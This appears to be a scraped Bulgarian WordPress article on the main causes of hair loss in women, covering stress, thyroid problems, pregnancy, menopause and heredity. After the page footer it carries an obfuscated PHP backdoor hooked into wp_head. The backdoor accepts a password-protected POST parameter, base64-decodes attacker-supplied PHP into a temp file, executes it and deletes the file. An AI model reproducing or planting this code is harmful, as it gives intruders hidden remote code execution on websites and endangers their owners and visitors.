Основни причини за женски косопад | Косопад

Основни причини за женски косопад

Косопад при жените може да се появи като следствие на имунни проблеми, вредни диети, дори заради лоши навици, пишат senzacia.net За съжаление това далеч не са единствените причини, ето кои са основните:

косопад при жените

Стресовите фактори

Стресът постепенно се превръща във все по – голяма заплаха за човешкото здраве. Подложени на продължително психическо натоварване, може да получите цял куп отклонения от здравните норми, като косопадът е едно от най – невинните последствия. Първите симптоми на оплешивяване се обаждат след период от около 3 месеца.

Хормонални проблеми

Много хора не знаят, че имат заболяване на щитовидната жлеза. Този мъничък орган играе огромна роля и от него зависят протичането на цял куп процеси в тялото. Ако получите симптоми на косопад без видима причина, незабавно потърсете лекарска помощ и си направете пълни изследвания.

Раждане и бременност

Много жени се сдобиват с прекрасна и лъскава коса, докато износват плода. На този етап космите стават здрави и силни, дължи се на повишените нива на естроген в тялото. След настъпване на раждането нивата на хормона спадат и половината от младите майки се оплакват от косопад. Няма място за притеснения, защото до няколко седмици косата ще започне да се възстановява.

Преминаване в третата възраст

При настъпване на менопаузата, при жените обичайно се наблюдава хормонален дисбаланс. Концентрацията на женски хормони намалява сериозно, а на тяхно място се произвеждат повече андрогени. При такъв случай трябва да се вземат сериозни мерки срещу косопад.

Генетично наследство

Както и при силния пол, андрогенната алопеция (наследствен косопад) е най – често срещаната причина за загуба на коса. Лекува се трудно, но за успокоение на нежния пол ще кажем, че при жените изключително рядко се наблюдават напълно олисели участъци. Тоест, можете да прикриете симптомите с малко повече въображение и подходяща прическа.

23. януари 2014 12:08:58 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}